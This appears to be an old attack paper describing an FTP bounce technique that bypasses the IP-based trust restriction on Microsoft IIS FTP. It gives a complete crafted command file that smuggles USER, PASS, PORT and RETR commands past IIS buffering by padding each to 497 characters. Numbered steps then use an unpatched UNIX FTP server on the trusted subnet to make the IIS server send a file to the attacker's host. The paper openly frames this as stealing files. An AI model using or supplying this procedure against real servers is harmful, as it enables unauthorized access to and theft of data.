The Microsoft ftp service, as provided for by Internet Information Server can be configured to allow connections from only certain ("trusted") IP addresses. This paper describes how this security arrangement could be by-passed depending on th e configuration of the remote network. This is based on a "bounce" attack but it is important to note that the target ftp server does not have to have the registry setting "EnablePortAttack" set to 1; in other words the server doesn’t have to be configured to allow an ftp bounce attack. You do, however, need one ftp server that you run the bounce attack from. This server has to be included in the range of trusted IP addresses. This will most likely be an unpatched UNIX server on the same subnet as your target IIS server.

 

Basically you are using this server as a platform to log into the IIS server and steal what files you can. The login process and other commands are contained in a file called cmds.txt and are sent to the IIS server using the ftp bounce attack. When a l ogin occurs this way, because of buffering the ftp service on IIS will read (or at least look for) a command every 497 characters after the first character of each command. So cmds.txt will begin with "user anonymous". 497 characters after the ‘ u’ of user IIS will read the next command. These characters can be garbage.

 

USER ANONYMOUS

1234567890abcdefghijklmnopqrstuvwxyz1

1234567890abcdefghijklmnopqrstuvwxyz2

1234567890abcdefghijklmnopqrstuvwxyz3

1234567890abcdefghijklmnopqrstuvwxyz4

1234567890abcdefghijklmnopqrstuvwxyz5

1234567890abcdefghijklmnopqrstuvwxyz6

1234567890abcdefghijklmnopqrstuvwxyz7

1234567890abcdefghijklmnopqrstuvwxyz8

1234567890abcdefghijklmnopqrstuvwxyz9

1234567890abcdefghijklmnopqrstuvwxyz0

1234567890abcdefghijklmnopqrstuvwxyzA

1234567890abcdefghijklmnopqrstuvwxyzB

1234567890abcdefghijklmnopqPASS A@HERE

1234567890abcdefghijklmnopqrstuvwxyz1

1234567890abcdefghijklmnopqrstuvwxyz2

1234567890abcdefghijklmnopqrstuvwxyz3

1234567890abcdefghijklmnopqrstuvwxyz4

1234567890abcdefghijklmnopqrstuvwxyz5

1234567890abcdefghijklmnopqrstuvwxyz6

1234567890abcdefghijklmnopqrstuvwxyz7

1234567890abcdefghijklmnopqrstuvwxyz8

1234567890abcdefghijklmnopqrstuvwxyz9

1234567890abcdefghijklmnopqrstuvwxyz0

1234567890abcdefghijklmnopqrstuvwxyzA

1234567890abcdefghijklmnopqrstuvwxyzB

1234567890abcdefghijklmnopqrstPORT 194,126,80,119,105,34

1234567890abcdefghijklmnopqrstuvwxyz1

1234567890abcdefghijklmnopqrstuvwxyz2

1234567890abcdefghijklmnopqrstuvwxyz3

1234567890abcdefghijklmnopqrstuvwxyz4

1234567890abcdefghijklmnopqrstuvwxyz5

1234567890abcdefghijklmnopqrstuvwxyz6

1234567890abcdefghijklmnopqrstuvwxyz7

1234567890abcdefghijklmnopqrstuvwxyz8

1234567890abcdefghijklmnopqrstuvwxyz9

1234567890abcdefghijklmnopqrstuvwxyz0

1234567890abcdefghijklmnopqrstuvwxyzA

1234567890abcdefghijklmnopqrstuvwxyzB

1234567890abcdvRETR FILE.TXT

1234567890-----à more garbage

 

I have put the commands in upper case here so they stand out.

 

So here’s how the attack would go :

Scenario:

HostA is a UNIX running an ftp service that has not been patched against bounce attacks. You can log into this server anonymously and have write permissions on at least one directory. HostA’s IP address is 123.123.123.120

 

HostB is an NT server running IIS and allows anonymous connections but only from IP addresses of the same subnet range eg 123.123.123.1 to 123.123.123.254. HostB has the IP address 123.123.123.123.

 

 

  1. Connect to Host A, login and change to a directory where you have write permission.
  2. Issue the command "quote pasv". The server will respond saying it is going into passive mode. Note the address and the port (ADD,ADD,ADD,ADD,PORT,PORT). Enter this value into your cmds.txt file and save it. Then issue the command "quote stor file.txt". The session will appear to hang. In actual fact it is waiting patiently for someone to connected to its port and send it file.txt.
  3. Open another session with Host A. Change to the same directory and upload cmds.txt.
  4. Now issue the command "quote port 123,123,123,123,0,21". This primes a connection to the target IIS server.
  5. Issue the command "quote retr cmds.txt". This causes HostA to make a connection to HostB and after the 3-way TCP handshake the contents of cmds.txt are transferred to HostB. HostB reads the first command USER anonymous. It will reply saying, "Anonymous access allowed, send identity (e-mail name) as password." But not that you’ll see this. This message is directed at HostB’s TCP port 20 (ftpdata). 497 characters after the letter ‘U’ of user the IIS server will read the next command "PASS a@here". It will reply "user anonymous logged in". Our next command (497 characters after the ‘P’ of PASS) is PORT ADD,ADD,ADD,ADD,PORT,PORT. Note – This d oes not go against the IIS ftp service’s built in security mechanism that disallows a PORT command if a different IP address to the clients is used. This will then set up a connection to the waiting port on Host A that we set up in step 1. Using the comma nd "RETR file.txt" will then cause HostB to send file.txt down to HostA and thus you have by-passed the security setup.